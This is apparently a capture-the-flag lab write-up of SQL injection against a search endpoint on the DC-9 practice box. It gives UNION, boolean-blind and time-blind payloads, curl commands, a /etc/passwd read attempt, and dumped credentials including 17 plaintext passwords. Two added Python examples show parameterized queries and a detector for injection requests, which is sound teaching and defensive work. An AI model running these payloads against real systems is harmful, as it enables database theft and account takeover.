SQL Injection
An SQL injection entry point has been identified in the search function of the target web application on host 192.168.207.209.
The vulnerable parameter is search, sent in a POST request to the /results.php endpoint.
UNION-based In-band
1' UNION SELECT 1,2,3,4,5,6 -- -
A total of 6 columns are present and all of them are reflected in the response.
1' UNION SELECT 1,2,3,user(),database(),version() -- -
- The current user is dbuser@localhost
- The current database is Staff
- The backend DB version is 10.3.17-MariaDB-0+deb10u1
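Why the search reflects attacker-chosen columns, and what the fix looks like, as an added example that is not the DC-9 application's code: a constructed six-column table and LIKE filter stand in for /results.php, the page's column-probe payload is run against a concatenated query and against a parameterized one, and a lone apostrophe is used as the canary that tells the two apart.

```python
import sqlite3

# Constructed stand-in for the search behind /results.php: a six-column table
# (matching the six reflected columns) and a LIKE filter. Example code, not the
# DC-9 application's own source; the table, rows and column names are made up.
STAFF_ROWS = [
    (1, "Mary", "Moe", "Sales", "123-4567", "Ask about cats"),
    (2, "Julie", "Dooley", "IT", "123-4568", "Loves pizza"),
]

# Page payload used to confirm the six reflected columns.
UNION_PAYLOAD = "1' UNION SELECT 1,2,3,4,5,6 -- -"


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE staff(id, firstname, lastname, dept, phone, notes)")
    con.executemany("INSERT INTO staff VALUES (?,?,?,?,?,?)", STAFF_ROWS)
    return con


def search_vulnerable(con, term):
    # The term is spliced into the SQL text, so a quote closes the string
    # literal, UNION SELECT appends attacker-chosen rows, and "-- -" comments
    # out the trailing "%'" that the template expected to supply.
    sql = "SELECT * FROM staff WHERE lastname LIKE '%" + term + "%'"
    return con.execute(sql).fetchall()


def search_parameterized(con, term):
    # The statement shape is fixed at parse time and the term is bound as a
    # value; the same payload is now just a string compared against lastname.
    sql = "SELECT * FROM staff WHERE lastname LIKE '%' || ? || '%'"
    return con.execute(sql, (term,)).fetchall()


def quote_breaks_query(con, term):
    # A lone apostrophe (e.g. a surname like O'Brien) is the cheapest canary:
    # the concatenated query fails to parse, the parameterized one does not.
    try:
        search_vulnerable(con, term)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    con = make_db()
    print("vulnerable :", search_vulnerable(con, UNION_PAYLOAD))     # [(1, 2, 3, 4, 5, 6)]
    print("hardened   :", search_parameterized(con, UNION_PAYLOAD))  # []
    print("O'Brien breaks vulnerable query:", quote_breaks_query(con, "O'Brien"))
```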
Databases (UNION-based In-band)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(schema_name) FROM information_schema.schemata -- -
A total of 3 databases are available:
- information_schema
- Staff
- users
Staff DB (UNION-based In-band)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema="Staff" -- -
A total of 2 tables are present in the Staff DB:
- StaffDetails
- Users
Staff.StaffDetails Table (UNION-based In-band)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema="Staff" AND table_name="StaffDetails" -- -
A total of 7 columns are present in the Staff.StaffDetails table.
This table is fully exposed at the /display.php endpoint.
Staff.Users Table (UNION-based In-band)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users" -- -
A total of 3 columns are present in the Staff.Users table:
- UserID
- Username
- Password
Staff.Users Exfiltration (UNION-based In-band)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(Username,":",Password) FROM Staff.Users -- -
Credential exfiltrated: admin:856f5de590ef37314e7c3bdf6f8a66dc
Password Cracking
Password hash cracked at crackstation.net: transorbital1
admin:transorbital1
Validating the credential against the /manage.php endpoint.
users DB (UNION-based In-band)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema="users" -- -
A single table exists within the users DB: UserDetails
users.UserDetails Table (UNION-based In-band)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema="users" AND table_name="UserDetails" -- -
A total of 6 columns exist in the users.UserDetails table:
- id
- firstname
- lastname
- username
- password
- reg_date
users.UserDetails Exfiltration (UNION-based In-band)
1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(username,":",password) FROM users.UserDetails -- -
A total of 17 credentials exfiltrated:
- marym:3kfs86sfd
- julied:468sfdfsd2
- fredf:4sfd87sfd1
- barneyr:RocksOff
- tomc:TC&TheBoyz
- jerrym:B8m#48sd
- wilmaf:Pebbles
- bettyr:BamBam01
- chandlerb:UrAG0D!
- joeyt:Passw0rd
- rachelg:yN72#dsd
- rossg:ILoveRachel
- monicag:3248dsds7s
- phoebeb:smellycats
- scoots:YR3BVxxxw87
- janitor:Ilovepeepee
- janitor2:Hawaii-Five-0
Validating against the target SSH server.
File Write (UNION-based In-band)
The web root directory on the host filesystem has not been identified.
1' UNION SELECT 1,2,3,4,5,"test123" INTO OUTFILE "/tmp/test.txt" -- -
Blind write; an attempt to confirm it via file read follows below.
File Read (UNION-based In-band)
1' UNION SELECT 1,2,3,4,5,LOAD_FILE("/tmp/test.txt") -- -
Failed.
1' UNION SELECT 1,2,3,4,5,LOAD_FILE("/etc/passwd") -- -
Failed to read /etc/passwd. This is likely due to a lack of permissions.
Boolean-based Blind
1' OR (SELECT COUNT(*) FROM DUAL WHERE user()='dbuser@localhost') -- -
Using the COUNT() function; DUAL is a dummy table used as a placeholder.
The current user is dbuser@localhost.
1' OR EXISTS(SELECT 1 FROM dual WHERE database()="Staff") -- -
Using the EXISTS() function; DUAL is a dummy table used as a placeholder.
The current DB is Staff.
1' OR EXISTS(SELECT 1 FROM dual WHERE version() LIKE "10.3.17-mariadb-0%") -- -
Using the EXISTS() function; DUAL is a dummy table used as a placeholder.
The version cannot be enumerated further, as the + sign in 10.3.17-MariaDB-0+deb10u1 is interpreted as URL encoding (a space) rather than a literal plus.
Databases (Boolean-based Blind)
1' OR (SELECT COUNT(schema_name) FROM information_schema.schemata)=3 -- -
Using the COUNT() function: there are a total of 3 databases.
1' OR EXISTS(SELECT 1 FROM information_schema.schemata WHERE schema_name="information_schema") -- -
information_schema DB
1' OR EXISTS(SELECT 1 FROM information_schema.schemata WHERE schema_name="Staff") -- -
Staff DB
1' OR EXISTS(SELECT 1 FROM information_schema.schemata WHERE schema_name="users") -- -
users DB
Staff DB (Boolean-based Blind)
1' OR (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="Staff")=2 -- -
A total of 2 tables within the Staff DB.
1' OR EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema="Staff" AND table_name="StaffDetails") -- -
Staff.StaffDetails Table
1' OR EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema="Staff" AND table_name="Users") -- -
Staff.Users Table
Staff.StaffDetails Table (Boolean-based Blind)
1' OR (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="Staff" AND table_name="StaffDetails")=7 -- -
A total of 7 columns are present in the Staff.StaffDetails table.
This table is fully exposed at the /display.php endpoint.
Staff.Users Table (Boolean-based Blind)
1' OR (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users")=3 -- -
A total of 3 columns are present in the Staff.Users table.
1' OR EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users" AND column_name="Username") -- -
Staff.Users.Username column.
1' OR EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users" AND column_name="Password") -- -
Staff.Users.Password column.
Staff.Users Exfiltration (Boolean-based Blind)
1' OR EXISTS(SELECT 1 FROM Staff.Users WHERE Username="admin") -- -
admin user
1' OR EXISTS(SELECT 1 FROM Staff.Users WHERE Username="admin" AND Password LIKE "856f5de590ef3731%") -- -
1' OR EXISTS(SELECT 1 FROM Staff.Users WHERE Username="admin" AND Password="856f5de590ef37314e7c3bdf6f8a66dc") -- -
856f5de590ef37314e7c3bdf6f8a66dc is the password hash.
Password hash cracked
users DB (Boolean-based Blind)
1' OR (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="users")=1 -- -
A single table exists within the users DB.
1' OR EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema="users" AND table_name="UserDetails") -- -
users.UserDetails Table
users.UserDetails Table (Boolean-based Blind)
A total of 6 columns exist in the users.UserDetails table.
1' OR EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="users" AND table_name="UserDetails" AND column_name="username") -- -
users.UserDetails.username column.
1' OR EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="users" AND table_name="UserDetails" AND column_name="password") -- -
users.UserDetails.password column.
users.UserDetails Exfiltration (Boolean-based Blind)
1' OR EXISTS(SELECT 1 FROM users.UserDetails WHERE username LIKE "jani%") -- -
1' OR EXISTS(SELECT 1 FROM users.UserDetails WHERE username="janitor") -- -
janitor user.
1' OR EXISTS(SELECT 1 FROM users.UserDetails WHERE username="janitor" AND password LIKE "Ilo%") -- -
1' OR EXISTS(SELECT 1 FROM users.UserDetails WHERE username="janitor" AND password="Ilovepeepee") -- -
Ilovepeepee is the password of the janitor user.
A total of 17 credentials exist, as listed above.
Time-based Blind
If a boolean-based attack works, a time-based attack inherently works as well.
The boolean-based SQLi payload only needs to be wrapped in IF() and SLEEP().
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(*) FROM DUAL WHERE database()="Staff"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.06s
user 0.01s
sys 0.00s
cpu 0%
This works, but it took 17 seconds because the injected condition is evaluated (executed) once per row; the scanned table has 17 rows, so SLEEP(1) fires 17 times.
The current DB is Staff
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(*) FROM DUAL WHERE user()="dbuser@localhost" LIMIT 1), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.47s
user 0.01s
sys 0.00s
cpu 0%
The current user is dbuser@localhost
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM dual WHERE version() LIKE "10.3.17-mariadb-0%"), SLEEP(1), 0) -- --- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.47s
user 0.01s
sys 0.00s
cpu 0%
Databases (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(schema_name) FROM information_schema.schemata)=3, SLEEP(1), 0) -- --- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.47s
user 0.01s
sys 0.00s
cpu 0%
3 DBs
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.schemata WHERE schema_name="information_schema"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
information_schema DB
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.schemata WHERE schema_name="Staff"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
Staff DB
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.schemata WHERE schema_name="users"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
users DB
Staff DB (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="Staff")=2, SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
2 Tables
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema="Staff" AND table_name="StaffDetails"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
Staff.StaffDetails Table
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema="Staff" AND table_name="Users"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
Staff.Users Table
Staff.StaffDetails Table (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="Staff" AND table_name="StaffDetails")=7, SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
7 columns at the Staff.StaffDetails table
This table is fully exposed at the /display.php endpoint.
Staff.Users Table (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users")=3, SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
3 columns at the Staff.Users table
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users" AND column_name="Username"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
Staff.Users.Username column
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="Staff" AND table_name="Users" AND column_name="Password"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
Staff.Users.Password column
Staff.Users Exfiltration (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM Staff.Users WHERE Username="admin"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
admin user
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM Staff.Users WHERE Username="admin" AND Password LIKE "856f5de590ef3731%"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM Staff.Users WHERE Username="admin" AND Password="856f5de590ef37314e7c3bdf6f8a66dc"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
856f5de590ef37314e7c3bdf6f8a66dc is the password hash of the admin user.
Password hash cracked.
users DB (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="users")=1, SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
Only 1 table
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema="users" AND table_name="UserDetails"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
users.UserDetails Table
users.UserDetails Table (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema="users" AND table_name="UserDetails")=6, SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
6 columns at the users.UserDetails table
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="users" AND table_name="UserDetails" AND column_name="username"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
users.UserDetails.username column
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM information_schema.columns WHERE table_schema="users" AND table_name="UserDetails" AND column_name="password"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
users.UserDetails.password column
users.UserDetails Exfiltration (Time-based Blind)
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM users.UserDetails WHERE username LIKE "jani%"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM users.UserDetails WHERE username="janitor"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
janitor user.
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM users.UserDetails WHERE username="janitor" AND password LIKE "Ilovepee%"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sqli=$(echo '1'\'' OR IF(EXISTS(SELECT 1 FROM users.UserDetails WHERE username="janitor" AND password="Ilovepeepee"), SLEEP(1), 0) -- -') ; time curl -s "http://$IP/results.php" --data "search=$sqli"
[...REDACTED...]
real 17.05s
user 0.01s
sys 0.00s
cpu 0%
Ilovepeepee is the password of the janitor user.
A total of 17 credentials exist, as listed above.
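From the defender's side, the three injection styles walked through on this page (UNION-based, boolean-based with OR/EXISTS subqueries, and time-based with SLEEP) each leave a distinct mark in the request body, and the time-based probes also leave a latency mark. The following is an added example, not tooling from the original writeup: it decodes constructed form bodies for the /results.php search parameter the way the server does and tags each request with the indicators that fire. The sample requests, the indicator names and the latency threshold are all assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample requests, not taken from the DC-9 box's logs: form body
# of the POST to /results.php plus the server-side response time in seconds.
# The bodies reuse payload shapes from this page; a real feed would be a
# reverse-proxy or WAF log that records request bodies and latency.
SAMPLE_REQUESTS = [
    {"body": "search=Moe", "secs": 0.02},
    {"body": "search=1' UNION SELECT 1,2,3,4,5,6 -- -", "secs": 0.03},
    {"body": "search=1' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(schema_name) FROM information_schema.schemata -- -", "secs": 0.03},
    {"body": "search=1' OR EXISTS(SELECT 1 FROM dual WHERE database()=\"Staff\") -- -", "secs": 0.02},
    {"body": "search=1' OR IF((SELECT COUNT(*) FROM DUAL WHERE database()=\"Staff\"), SLEEP(1), 0) -- -", "secs": 17.06},
    {"body": "search=1' UNION SELECT 1,2,3,4,5,LOAD_FILE(\"/etc/passwd\") -- -", "secs": 0.02},
]

# Each signature maps to one technique shown on the page (names are assumed).
SIGNATURES = {
    "union_select": re.compile(r"\bUNION\b.{0,40}?\bSELECT\b", re.I | re.S),
    "schema_probe": re.compile(r"\binformation_schema\b", re.I),
    "or_subquery": re.compile(r"'\s*OR\s+.{0,20}?\b(EXISTS|SELECT)\b", re.I | re.S),
    "time_based": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "file_io": re.compile(r"\b(LOAD_FILE|INTO\s+OUTFILE|INTO\s+DUMPFILE)\b", re.I),
}

# Assumed threshold, well above normal latency. The page's SLEEP(1) probes took
# about 17 s because the injected condition is evaluated once per scanned row
# (17 rows), so the delay scales with table size, not just the SLEEP argument.
SLOW_SECS = 5.0


def classify(req):
    """Return the list of indicator names that fire for one request."""
    hits = []
    # parse_qs decodes the form body the way the server does: '+' becomes a
    # space, which is also why the page could not match "+deb10u1" directly.
    values = [v for vs in parse_qs(req["body"], keep_blank_values=True).values() for v in vs]
    for name, rx in SIGNATURES.items():
        if any(rx.search(v) for v in values):
            hits.append(name)
    if req["secs"] >= SLOW_SECS:
        hits.append("slow_response")
    return hits


def triage(requests):
    """Return (body, hits) for every request that fires at least one indicator."""
    return [(r["body"], classify(r)) for r in requests if classify(r)]


if __name__ == "__main__":
    for body, hits in triage(SAMPLE_REQUESTS):
        print(", ".join(hits), "<-", body)
```

The latency indicator is deliberately separate from the token signatures: a time-based probe that obfuscates the SLEEP token still shows up as an outlier against the endpoint's normal response time.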